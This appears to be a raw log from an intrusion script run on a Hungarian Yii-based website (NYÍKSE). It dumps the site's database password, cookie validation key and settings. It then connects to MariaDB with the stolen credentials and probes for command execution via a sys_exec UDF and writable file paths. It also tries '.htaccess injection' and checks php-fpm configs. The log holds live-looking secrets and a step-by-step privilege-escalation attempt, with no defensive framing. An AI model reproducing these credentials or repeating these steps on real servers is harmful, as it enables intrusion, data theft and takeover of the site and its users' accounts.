=== DB Config === 'yii\db\Connection', 'dsn' => 'mysql:host=localhost;dbname=nyikse', 'username' => 'nyikse', 'password' => 'UNos3S6pOfjCo744', 'charset' => 'utf8', 'enableSchemaCache' => true, 'schemaCacheDuration' => 86400, ////1 nap 'schemaCache' => 'cache', ]; === Web Config === 'basic', 'name'=>'NYÍKSE', 'language' => 'hu-HU', 'sourceLanguage' => 'hu-HU', 'timeZone' => 'Europe/Budapest', 'basePath' => dirname(__DIR__), 'bootstrap' => ['log','languagepicker'], 'components' => [ 'assetManager' => [ 'bundles' => [ 'yii\web\JqueryAsset' => [ 'jsOptions' => [ 'position' => \yii\web\View::POS_HEAD ], 'basePath' => '@webroot', 'baseUrl' => '@web', 'js' => [ 'js/jquery.js', ] ], ], ], 'request' => [ 'cookieValidationKey' => '0Y5nZXuXQxpoWyrpN-3O18u9J82q8mEj', ], 'cache' => [ 'class' => 'yii\caching\FileCache', ], 'user' => [ 'identityClass' => 'app\modules\Users\models\Users', 'enableAutoLogin' => true, 'loginUrl' => ['users/login'], ], 'errorHandler' => [ 'errorAction' => 'site/error', ], 'mailer' => [ 'class' => 'yii\swiftmailer\Mailer', 'useFileTransport' => true, ], 'log' => [ 'traceLevel' => YII_DEBUG ? 3 : 0, 'targets' => [ [ 'class' => 'yii\log\FileTarget', 'levels' => ['error', 'warning', 'info', 'trace'], ], ], ], 'extra' => [ 'class' => 'app\components\extra', ], 'settings' => [ 'class' => 'app\components\Settings', ], 'imagecache' => [ 'class' => 'app\modules\Imagecache\components\imagecaching', ], 'favicongenerator' => [ 'class' => 'app\modules\Settings\components\favicongenerator', ], 'paypal' => [ 'class' => 'app\components\paypal', ], 'i18n' => [ 'translations' => [ 'app' => [ 'class' => 'yii\i18n\DbMessageSource', 'db' => 'db', 'sourceLanguage' => 'hu-HU', 'sourceMessageTable' => '{{%language_source}}', 'messageTable' => '{{%language_translate}}', 'forceTranslation' => true, 'cachingDuration' => 86400, 'enableCaching' => false, ], '*' => [ 'class' => 'yii\i18n\DbMessageSource', 'db' => 'db', 'sourceLanguage' => 'hu-HU', 'sourceMessageTable' => '{{%language_source}}', 'messageTable' => '{{%language_translate}}', 'forceTranslation' => true, 'cachingDuration' => 86400, 'enableCaching' => false, === Params === 'NYÍKSE', 'staticpagesPictures' => '/images/staticpages/', 'eventsPictures' => '/images/events/', 'watermarkPictures' => '/images/watermarks/', 'contentPictures' => '/images/content/', 'offersPictures' => '/images/offers/', 'newsPictures' => '/images/news/', 'teamPictures' => '/images/team/', 'partnersPictures' => '/images/partners/', 'referencesPictures' => '/images/references/', 'productscategoryPictures' => '/images/products/category/', 'productsPictures' => '/images/products/products/', 'productscategoryIcon' => '/images/products/category/icon/', 'productsbrandsPictures' => '/images/products/brands/', 'productsVariations' => '/images/products/products/variations/', 'videoPictures' => '/images/video/', 'eventsPictures' => '/images/events/', 'documentsFiles' => '/documents/', 'newsPerpage' => 8, 'szamlazzUname' => '', 'szamlazzPass' => '', ]; === Try MySQL connect & UDF === Host: localhost User: nyikse Pass: UNos3S6pOfjCo744 DB: nyikse MYSQL CONNECTED! Server version: 5.5.5-10.2.30-MariaDB-10.2.30+maria~stretch-log MySQL version: 10.2.30-MariaDB-10.2.30+maria~stretch-log plugin_dir: /usr/lib/mysql/plugin/ secure_file_priv: EMPTY (can write anywhere!) sys_exec not available: FUNCTION nyikse.sys_exec does not exist === Try alternative: .htaccess injection === Current .htaccess: Options +ExecCGI AddHandler cgi-script .cgi .sh RewriteEngine on # If a directory or a file exists, use the request directly RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d # Otherwise forward the request to index.php RewriteRule . index.php RewriteBase / RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC] RewriteRule ^(.*)$ http://%1/$1 [R=301,L] === Check php-fpm pool config paths ===